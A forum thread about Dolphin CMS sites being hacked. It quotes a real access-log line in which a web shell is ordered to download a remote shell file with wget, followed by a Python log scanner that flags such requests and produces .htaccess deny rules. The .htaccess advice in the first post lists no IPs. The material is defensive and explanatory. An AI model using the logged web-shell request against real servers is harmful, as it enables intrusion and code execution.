Today I happened to check a site that used Dolphin and was hacked. I have found that they have deleted all the files from it and uploaded a script that fetches the contacts from orkut.com and sends mail with a virus link (I am not posting that link here as it may be used by someone).
I have found the Dolphin security issues that helped them hack the sites. I am currently in the process of developing a patch to fix all these issues. I know I will succeed in this.
I have checked that site and found many IPs that were used to hack the sites. I need to provide those IPs to everyone so you can block them on your server.
To block these IPs on your host:
Open the file ".htaccess".
At the very beginning of it, add the following:
<Files 403.shtml>
order allow,deny
allow from all
</Files>
Regards,
Praveen
Yet you don't list one of the following IPs:
125.164.213.29 - - [09/Jul/2008:20:54:01 -0500] "GET //ray/modules/global/inc/content.inc.php?act=cmd&d=%2Fhsphere%2Flocal%2Fhome%2Frprinc%2FDOLPHIN_SITE.com%2Fray%2Fmodules%2Fglobal%2Finc%2F&cmd=wget+http%3A%2F%2Fh1.ripway.com%2Fsava%2Fshell%2Fbikang.txt&cmd_txt=1&submit=Execute
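An added example, not part of the original thread or of Dolphin's code: a small access-log scan that flags requests carrying the `act=cmd` / `cmd=` parameters seen in the logged request above and emits `deny from` lines in the format the first post uses. The log lines, IPs (documentation ranges) and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Common Log Format prefix. The request part is matched loosely because pasted
# lines, like the one quoted in the thread, are often cut off mid-request.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)')

def find_shell_requests(lines):
    """Return one dict per request whose query string passes a command."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line
        # Split on "?" by hand: a URL parser would read the leading "//ray"
        # as a host name and drop it from the path.
        path, _, query = m["target"].partition("?")
        params = parse_qs(query, keep_blank_values=True)  # also URL-decodes
        if params.get("act") == ["cmd"] or "cmd" in params:
            hits.append({"ip": m["ip"], "time": m["ts"], "path": path,
                         "cmd": params.get("cmd", [""])[0]})
    return hits

def deny_rules(hits):
    """Build de-duplicated, sorted .htaccess lines for the flagged sources."""
    return ["deny from " + ip for ip in sorted({h["ip"] for h in hits})]

# Constructed sample log (the first line is deliberately truncated).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Jul/2008:20:54:01 -0500] "GET //ray/modules/global/inc/'
    'content.inc.php?act=cmd&cmd=wget+http%3A%2F%2Fexample.invalid%2Fa.txt'
    '&cmd_txt=1&submit=Execute',
    '198.51.100.7 - - [09/Jul/2008:20:55:12 -0500] "GET /index.php?page=home HTTP/1.1" 200 5120',
    '192.0.2.10 - - [09/Jul/2008:20:56:40 -0500] "POST /ray/modules/global/inc/'
    'content.inc.php?act=cmd&cmd=id HTTP/1.1" 200 312',
    '203.0.113.5 - - [09/Jul/2008:21:01:03 -0500] "GET /search.php?q=cmd HTTP/1.1" 200 900',
    '198.51.100.23 - - [09/Jul/2008:21:04:19 -0500] "GET /ray/modules/global/inc/'
    'content.inc.php?act=cmd&d=%2Ftmp HTTP/1.1" 200 288',
]

if __name__ == "__main__":
    found = find_shell_requests(SAMPLE_LOG)
    for h in found:
        print(h["time"], h["ip"], h["path"], repr(h["cmd"]))
    print("\n".join(deny_rules(found)))
```

The decoded `cmd` value shows what the web shell was asked to run, which is usually more useful for clean-up than the source IP alone.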
I found this online tool. I think if anybody is building a local network, it's better to block all other IPs except your country.
I hope this will be helpful.